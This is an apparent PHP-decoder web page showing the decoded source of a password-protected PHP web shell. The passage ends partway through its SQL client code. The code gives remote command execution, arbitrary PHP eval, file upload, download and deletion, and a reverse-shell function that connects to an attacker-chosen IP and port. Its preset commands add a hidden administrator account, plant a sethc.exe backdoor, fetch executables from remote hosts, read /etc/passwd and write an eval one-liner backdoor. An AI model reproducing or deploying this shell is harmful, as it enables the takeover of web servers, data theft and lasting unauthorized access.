Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(E_ERROR); @ini_set('display_errors','Off'); @ini_set('max_executi..

Decoded Output download

<?php 
error_reporting(E_ERROR); 
@ini_set('display_errors','Off'); 
@ini_set('max_execution_time',20000); 
@ini_set('memory_limit','256M'); 
header("content-Type: text/html; charset=utf-8"); 
$password = "2aefc34200a294a3cc7db81b43a81873"; //V 
define('B','Denzel-'); //  
 
function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); } 
function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; } 
$myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__); 
$myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile; 
define('THISDIR',strdir(dirname($myfile).'/')); 
define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/')); 
define('EXISTS_PHPINFO',getinfo() ? true : false); 
if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); } 
if(function_exists('mysql_close')) { $issql = 'MySql'; } 
if(function_exists('mssql_close')) $issql .= ' - MsSql'; 
if(function_exists('oci_close')) $issql .= ' - Oracle'; 
if(function_exists('sybase_close')) $issql .= ' - SyBase'; 
if(function_exists('pg_close')) $issql .= ' - PostgreSql'; 
$win = substr(PHP_OS,0,3) == 'WIN' ? true : false; 
$msg = VERSION; 
 
function filew($filename,$filedata,$filemode) { 
	if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); } 
	$handle = fopen($filename,$filemode); 
	$key = fputs($handle,$filedata); 
	fclose($handle); 
	return $key; 
} 
 
function filer($filename) { 
	$handle = fopen($filename,'r'); 
	$filedata = fread($handle,filesize($filename)); 
	fclose($handle); 
	return $filedata; 
} 
 
function fileu($filenamea,$filenameb) { 
	$key = move_uploaded_file($filenamea,$filenameb) ? true : false; 
	if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; } 
	return $key; 
} 
 
function filed($filename) { 
	if(!file_exists($filename)) return false; 
	ob_end_clean(); 
	$name = basename($filename); 
	$array = explode('.',$name); 
	header('Content-type: application/x-'.array_pop($array)); 
	header('Content-Disposition: attachment; filename='.$name); 
	header('Content-Length: '.filesize($filename)); 
	@readfile($filename); 
	exit; 
} 
 
function showdir($dir) { 
	$dir = strdir($dir.'/'); 
	if(($handle = @opendir($dir)) == NULL) return false; 
	$array = array(); 
	while(false !== ($name = readdir($handle))) { 
		if($name == '.' || $name == '..') continue; 
		$path = $dir.$name; 
		$name = strtr($name,array('\'' => '%27','"' => '%22')); 
		if(is_dir($path)) { $array['dir'][$path] = $name; } 
		else { $array['file'][$path] = $name; } 
	} 
	closedir($handle); 
	return $array; 
} 
 
function deltree($dir) { 
	$handle = @opendir($dir); 
	while(false !== ($name = @readdir($handle))) { 
		if($name == '.' || $name == '..') continue; 
		$path = $dir.$name; 
		@chmod($path,0777); 
		if(is_dir($path)) { deltree($path.'/'); } 
		else { @unlink($path); } 
	} 
	@closedir($handle); 
	return @rmdir($dir); 
} 
 
function size($bytes) { 
	if($bytes < 1024) return $bytes.' B'; 
	$array = array('B','K','M','G','T'); 
	$floor = floor(log($bytes) / log(1024)); 
	return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor)))); 
} 
 
function find($array,$string) { 
	foreach($array as $key) { if(stristr($string,$key)) return true; } 
	return false; 
} 
 
function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) { 
	if(($handle = @opendir($dir)) == NULL) return false; 
	while(false !== ($name = readdir($handle))) { 
		if($name == '.' || $name == '..') continue; 
		$path = $dir.$name; 
		if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); } 
		else { 
			if($inc && (!find($inc,$name))) continue; 
			$code = $tye ? filer($path) : $name; 
			$find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1)); 
			if($find) { 
				$file = strtr($path,array($now => '','\'' => '%27','"' => '%22')); 
				echo '<a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>'; 
				flush(); ob_flush(); 
			} 
			unset($code); 
		} 
	} 
	closedir($handle); 
	return true; 
} 
 
function antivirus($dir,$exs,$matches,$now) { 
	if(($handle = @opendir($dir)) == NULL) return false; 
	while(false !== ($name = readdir($handle))) { 
		if($name == '.' || $name == '..') continue; 
		$path = $dir.$name; 
		if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); } 
		else { 
			$iskill = NULL; 
			foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } } 
			if(strpos(size(filesize($path)),'M')) continue; 
			if($iskill) { 
				$code = filer($path); 
				foreach($matches[$iskill] as $matche) { 
					$array = array(); 
					preg_match($matche,$code,$array); 
					if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue; 
					$len = strlen($array[0]); 
					if($len > 6 && $len < 200) { 
						$file = strtr($path,array($now => '','\'' => '%27','"' => '%22')); 
						echo ' <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>'; 
						flush(); ob_flush(); break; 
					} 
				} 
				unset($code,$array); 
			} 
		} 
	} 
	closedir($handle); 
	return true; 
} 
 
function command($cmd,$cwd,$com = false) { 
	$iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = ''; 
	if($cwd == 'com' || $com) { 
		if($iswin && class_exists('COM')) { 
			$wscript = new COM('Wscript.Shell'); 
			$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd); 
			$stdout = $exec->StdOut(); 
			$res = $stdout->ReadAll(); 
			$msg = 'Wscript.Shell'; 
		} 
	} else { 
		chdir($cwd); $cwd = getcwd(); 
		if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; } 
		elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; } 
		elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; } 
		elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; } 
		elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; } 
		elseif(function_exists('proc_open')) { 
			$env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); 
			$des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); 
			$process = @proc_open ($cmd,$des,$pipes,$cwd,$env); 
			if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); } 
			@proc_close($process); 
			$msg = 'proc_open'; 
		} 
	} 
	$msg = $res == '' ? '<h1>NULL</h1>' : '<h2>'.$msg.'</h2>'; 
	return array('res' => $res,'msg' => $msg); 
} 
 
function backshell($ip,$port,$dir,$type) { 
	$key = false; 
	$c_bin = ''; 
	switch($type) { 
		case "pl" :  
		$shell = ''; 
		$file = strdir($dir.'/t00ls.pl'); 
		$key = filew($file,base64_decode($shell),'w'); 
		if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); } 
		break; 
		case "py" :  
		$shell = ''; 
		$file = strdir($dir.'/t00ls.py'); 
		$key = filew($file,base64_decode($shell),'w'); 
		if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); } 
		break; 
		case "c" :  
		$file = strdir($dir.'/t00ls'); 
		$key = filew($file,base64_decode($c_bin),'wb'); 
		if($key) { @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); } 
		break; 
		case "php" : case "phpwin" :  
		if(function_exists('fsockopen')) { 
			$sock = @fsockopen ($ip,$port); 
			if($sock) { 
				$key = true; 
				$com = $type == 'phpwin' ? true : false; 
				$user = get_current_user(); 
				$dir = strdir(getcwd()); 
				fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# "); 
				while($cmd = fread($sock,1024)) { 
					if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); } 
					elseif (trim(strtolower($cmd)) == 'exit') { break; } 
					else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); } 
					fputs($sock,'['.$user.':'.$dir.']# '); 
				} 
			} 
			@fclose ($sock); 
		} 
		break; 
		case "pcntl" :  
		$file = strdir($dir.'/t00ls'); 
		$key = filew($file,base64_decode($c_bin),'wb'); 
		if($key) { @chmod($file,0777); if(function_exists('pcntl_exec')) { @pcntl_exec($file,array($ip,$port)); } } 
		break; 
	} 
	if(!$key) { $msg = '<h1></h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; } 
	return $msg; 
} 
 
function getinfo() { 
	global $password; 
	$infos = array($_POST['getpwd'],$password,function_exists('phpinfo')); 
	if($password != '' && md5($infos[0]) != $infos[1]) { 
	echo ' 
<title></title> 
<meta http-equiv="content-type" content="text/html;charset=gb2312"> 
<style type="text/css"> 
.form-control { 
display: block; 
width: 100%; 
height: 38px; 
padding: 8px 12px; 
font-size: 14px; 
line-height: 1.428571429; 
color: #555; 
vertical-align: middle; 
background-color: #fff; 
border: 1px solid #ccc; 
border-radius: 4px; 
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); 
box-shadow: inset 0 1px 1px rgba(0,0,0,0.075); 
-webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s; 
transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s 
} 
 
.btn { 
display: inline-block; 
padding: 8px 12px; 
margin-bottom: 0; 
font-size: 14px; 
font-weight: 500; 
line-height: 1.428571429; 
text-align: center; 
white-space: nowrap; 
vertical-align: middle; 
cursor: pointer; 
border: 1px solid transparent; 
border-radius: 4px; 
-webkit-user-select: none; 
-moz-user-select: none; 
-ms-user-select: none; 
-o-user-select: none; 
user-select: none 
} 
 
.btn-primary { 
color: #fff; 
background-color: #428bca; 
border-color: #428bca 
} 
</style> 
<center> 
<br><br> 
<font size="3" face="Microsoft YaHei"> 
360D</font> 
<br><br> 
<form method="POST"> 
<input style="Width:125pt;display:inline-block;font-family:Microsoft YaHeifont-size:90%" class="form-control" placeholder="@Passwrd" type="password" name="getpwd"> 
'; 
if(isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="'.$_POST['pass'].'">'; } 
if(isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="'.$_POST['pass'].'" value="'.$_POST[$_POST['pass']].'">'; } 
if(isset($_POST['check'])) { echo '<input type="hidden" name="check" value="'.$_POST['check'].'">'; } 
echo '<input style="Width:55pt;font-size:90%;font-family:Microsoft YaHei" class="btn btn-primary" type="submit" value="#Login"></form></center></body></html>'; 
exit; 
	} 
	@setcookie("new",951); 
	if(@$_COOKIE["new"]!=95){@setcookie("new",95);} 
	return $infos[2]; 
} 
function links(){ 
	$hostr = $_SERVER["HTTP_HOST"]; 
	$arr = file_get_contents("http://mytool.chinaz.com/baidusort.aspx?host=".$hostr); 
	$arr= iconv('UTF-8','GB2312' , $arr); 
	preg_match_all("/<div class=\"siteinfo\"><font color=\"blue\">[1-9]<\/font>/",$arr,$s); 
	$c=$s[0][0]; 
	$c=str_replace("<div class=\"siteinfo\"><font color=\"blue\">","",$c); 
	$c=str_replace("</font>","",$c); 
	return $c; 
} 
 
 
function subeval() { 
	if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; } 
	if(isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="'.$_POST['pass'].'">'; } 
	if(isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="'.$_POST['pass'].'" value="'.$_POST[$_POST['pass']].'">'; } 
	if(isset($_POST['check'])) { echo '<input type="hidden" name="check" value="'.$_POST['check'].'">'; } 
	return true; 
} 
 
if(isset($_POST['go'])) { 
	if($_POST['go'] == 'down') { 
		$downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']); 
		if(!filed($downfile)) { $msg = '<h1></h1>'; } 
	} 
} 
 
?> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<style type="text/css"> 
* {margin:0px;padding:0px;} 
body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Microsoft YaHei,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;} 
a{color:#000000;text-decoration:none;vertical-align:middle;} 
a:hover{color:#FF0000;text-decoration:underline;} 
p {padding:1px;line-height:1.6em;} 
h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;} 
h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;} 
form {display:inline;} 
input,select { vertical-align:middle; } 
input[type=text], textarea {padding:1px;font-family:Microsoft YaHei,sans-serif;} 
input[type=submit], input[type=button] {height:21px;} 
.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;} 
.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;} 
.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;} 
.main {width:963px;margin:0 auto;padding:10px;} 
.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;} 
.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;} 
.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;} 
.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;} 
.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;} 
.tables {width:100%;} 
.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;} 
.tables td {background:#F9F6F4;height:19px;padding-left:2px;} 
</style> 
<script type="text/javascript"> 
function $(ID) { return document.getElementById(ID); } 
function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; } 
function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); } 
function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } } 
function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); }  
function nf(a,b) { re = prompt("",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } }  
function dels(a) { if(a == 'b') { var msg = ""; $('act').value = a; } else { var msg = ""; $('act').value = 'deltree'; $('var').value = a; } if(confirm(""+msg+"")) { $('frm1').submit(); } } 
function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } } 
function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } } 
</script> 
<title><?php echo VERSION.' - '.date('Y-m-d H:i:s N',time()).'';?></title> 
</head> 
<body> 
<div class="main"> 
	<div class="outl"> 
	<div class="toptag"><?php echo ($_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : gethostbyname($_SERVER['SERVER_NAME'])).' - '.php_uname().' - whoami('.get_current_user().') - uid('.getmyuid().') gid('.getmygid().')'; if(isset($issql)) echo ' - '.$issql.'';?></div> 
<?php  
$menu = array('file' => '','scan' => '','antivirus' => '','backshell' => '','exec' => '','phpeval' => 'PHP','sql' => 'SQL','info' => ''); 
$go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file'; 
$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR; 
echo '<div class="tag">'; 
foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; } 
echo '</div>'; 
 
echo '<form name="gofrm" id="gofrm" method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" id="go" value="">'; 
echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">'; 
echo '<input type="hidden" name="govar" id="govar" value="">'; 
echo '</form>'; 
 
switch($_POST['go']) { 
 
case "info" :  
if(EXISTS_PHPINFO) { 
	ob_start(); 
	phpinfo(INFO_GENERAL); 
	$out = ob_get_contents(); 
	ob_end_clean(); 
	$tmp = array(); 
	preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp); 
	$config = $tmp[2][0]; 
	$phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1]; 
} 
$infos = array( 
	'' => $_SERVER['HTTP_USER_AGENT'], 
	'' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()', 
	'' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()', 
	'PHP.ini' => $phpini ? $phpini : '()', 
	'PHP' => php_sapi_name(), 
	'PHP' => PHP_VERSION, 
	'PHPPID' => getmypid(), 
	'IP' => $_SERVER['REMOTE_ADDR'], 
	'' => $_SERVER['HTTP_ACCEPT_LANGUAGE'], 
	'Web' => $_SERVER['SERVER_PORT'], 
	'Web' => $_SERVER['DOCUMENT_ROOT'], 
	'Web' => $_SERVER['SCRIPT_FILENAME'], 
	'WebCGI' => $_SERVER['GATEWAY_INTERFACE'], 
	'WebEmail' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '()', 
	'' => size(disk_total_space('.')), 
	'' => size(disk_free_space('.')), 
	'POST' => get_cfg_var("post_max_size"), 
	'' => get_cfg_var("upload_max_filesize"), 
	'' => get_cfg_var("memory_limit"), 
	'' => get_cfg_var("max_execution_time").'', 
	'Fsockopen' => function_exists('fsockopen') ? '' : '', 
	'Socket' => function_exists('socket_close') ? '' : '', 
	'Pcntl' => function_exists('pcntl_exec') ? '' : '', 
	'Curl' => function_exists('curl_version') ? '' : '', 
	'Zlib' => function_exists('gzclose') ? '' : '', 
	'FTP' => function_exists('ftp_login') ? '' : '', 
	'XML' => function_exists('xml_set_object') ? '' : '', 
	'GD_Library' => function_exists('imageline') ? '' : '', 
	'COM' => class_exists('COM') ? '' : '', 
	'ODBC' => function_exists('odbc_close') ? '' : '', 
	'IMAP' => function_exists('imap_close') ? '' : '', 
	'' => get_cfg_var("safemode") ? '' : '', 
	'URL' => get_cfg_var("allow_url_fopen") ? '' : '', 
	'' => get_cfg_var("enable_dl") ? '' : '', 
	'' => get_cfg_var("display_errors") ? '' : '', 
	'' => get_cfg_var("register_globals") ? '' : '', 
	'' => get_cfg_var("magic_quotes_gpc") ? '' : '', 
	'PHP' => $config ? $config : '()' 
); 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<table class="tables"><tr><th style="width:26%;"></th><th></th></tr>'; 
foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; } 
echo '</table>'; 
break; 
 
case "exec" :  
$cmd = $win ? 'dir' : 'ls -al'; 
$res = array('res' => '','msg' => $msg); 
$str = isset($_POST['str']) ? $_POST['str'] : 'fun'; 
if(isset($_POST['execcmd'])) { 
	$cmd = $_POST['execcmd']; 
	$cwd = $str == 'fun' ? THISDIR : 'com'; 
	$res = command($cmd,$cwd); 
} 
echo '<div class="msgbox">'.$res['msg'].'</div>'; 
echo '<form method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" id="go" value="exec">'; 
echo '<div class="actall"> <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> '; 
echo '<select name="str">'; 
$selects = array('fun' => 'phpfun','com' => 'wscript'); 
foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; } 
echo '</select> '; 
echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">'; 
echo '<option>------</option>'; 
echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' >> '.THISDIR.'t00ls.txt"></option>'; 
echo '<option value="whoami">whoami</option>'; 
echo '<option value="systeminfo">(Win)</option>'; 
echo '<option value="path">path(Win)</option>'; 
echo '<option value="ipconfig /all">ipconfig(Win)</option>'; 
echo '<option value="tasklist /svc">tasklist(Win)</option>'; 
echo '<option value="netstat -an">netstat -an(Win)</option>'; 
echo '<option value="net user">net user(Win)</option>'; 
echo '<option value="net config workstation">net config workstation(Win)</option>'; 
echo '<option value="net config server">net config server(Win)</option>'; 
echo '<option value="net user $ahsec ahsec /add & net localgroup administrators $ahsec /add">(Win)</option>'; 
echo '<option value="query user">query user(Win)</option>'; 
echo '<option value="copy c:windowsexplorer.exe c:windowssystem32sethc.exe & copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe">shift(Win)</option>'; 
echo '<option value="tftp -i ip get server.exe c:\server.exe">Ftp(Win)</option>'; 
echo '<option value="ps -ef">ps(Linux)</option>'; 
echo '<option value="ifconfig">ifconfig(Linux)</option>'; 
echo '<option value="cat /etc/syslog.conf">syslog.conf(Linux)</option>'; 
echo '<option value="cat /etc/my.cnf">my.cnf(Linux)</option>'; 
echo '<option value="cat /etc/hosts">hosts(Linux)</option>'; 
echo '<option value="cat /etc/services">services(Linux)</option>'; 
echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-</option>'; 
echo '</select> '; 
echo '<input type="submit" style="width:50px;" value="">'; 
echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>'; 
break; 
 
case "scan" :  
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; 
$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : ''; 
$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py'; 
$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js'; 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<form method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" id="go" value="scan">'; 
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>'; 
echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>'; 
echo '<tr><td></td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> ()</td></tr>'; 
echo '<tr><td></td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> ("|", )</td></tr>'; 
echo '<tr><td></td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> ("|", )</td></tr>'; 
echo '<tr><td></td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'></label> '; 
echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'></label> '; 
echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'></label></td></tr>'; 
echo '<tr><td></td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>,</label> '; 
echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'></label></td></tr>'; 
echo '<tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>'; 
echo '</table></form>'; 
if($keyword != '') { 
	flush(); ob_flush(); 
	echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">'; 
	$incs = $include == '' ? false : explode('|',$include); 
	$fits = $filters == '' ? false : explode('|',$filters); 
	$isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir); 
	echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>'; 
} 
break; 
 
case "antivirus" :  
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; 
$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml'); 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<form method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" id="go" value="antivirus">'; 
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>'; 
echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> ()</td></tr>'; 
echo '<tr><td></td><td>'; 
$types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp'); 
foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? ' checked' : '').'>'.$key.'</label> '; 
echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>'; 
echo '</table></form>'; 
if(count($_POST['types']) > 0) { 
	$matches = array( 
		'php' => array(	), 
		'asp+aspx' => array(	), 
		'jsp' => array() 
	); 
	flush(); 
	ob_flush(); 
	echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">'; 
	$isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir); 
	echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>'; 
} 
break; 
 
case "phpeval" :  
if(isset($_POST['phpcode'])) { 
	$phpcode = chop($_POST['phpcode']); 
	ob_start(); 
	if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); } 
	else { @eval ($phpcode); } 
	$out = ob_get_contents(); 
	ob_end_clean(); 
} else { 
	$phpcode = 'phpinfo();'; 
	$out = ''; 
} 
echo base64_decode(''); 
echo '<div class="msgbox">'.$msg.'</div>'; 
echo '<form method="POST">'; 
subeval(); 
echo '<input type="hidden" name="go" id="go" value="phpeval">'; 
echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>'; 
echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">'; 
echo '<option>------</option>'; 
echo '<option value="echo readfile(\'C:/web/t00ls.php\');"></option>'; 
echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);"></option>'; 
echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';"></option>'; 
echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';"></option>'; 
echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';"></option>'; 
echo '<option value="print_r($_SERVER);"></option>'; 
echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find rootkit</option>'; 
echo '</select> '; 
echo '<input type="submit" style="width:80px;" value=""></p></div>'; 
echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="HTML" onclick="runcode(\'evalcode\')"></p></div>'; 
break; 
 
case "sql" :  
if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) { 
	$type = $_POST['type']; 
	$sqlhost = $_POST['sqlhost']; 
	$sqluser = $_POST['sqluser']; 
	$sqlpass = $_POST['sqlpass']; 
	$sqlname = $_POST['sqlname']; 
	$sqlcode = $_POST['sqlcode']; 
	$names = $_POST['names']; 
	switch($type) { 
		case "PostgreSql" :  
		if(function_exists('pg_close')){ 
			if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; } 
			else { $sqlport = 5432; } 
			$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass"); 
			if($dbconn) { 
				$msg = '<h2>'.$type.' </h2>'; 
				pg_query('set client_encoding='.$names); 
				$result = pg_query($sqlcode); 
				if($result) { $msg .= '<h2> - SQL</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } } 
				else { $msg .= '<h1> - SQL</h1>'; $rows = array('error' => pg_result_error($result)); } 
				pg_free_result($result); 
			} else { 
				$msg = '<h1>'.$type.'</h1>'; 
			} 
			@pg_close($dbconn); 
		} else { 
			$msg = '<h1>'.$type.'</h1>'; 
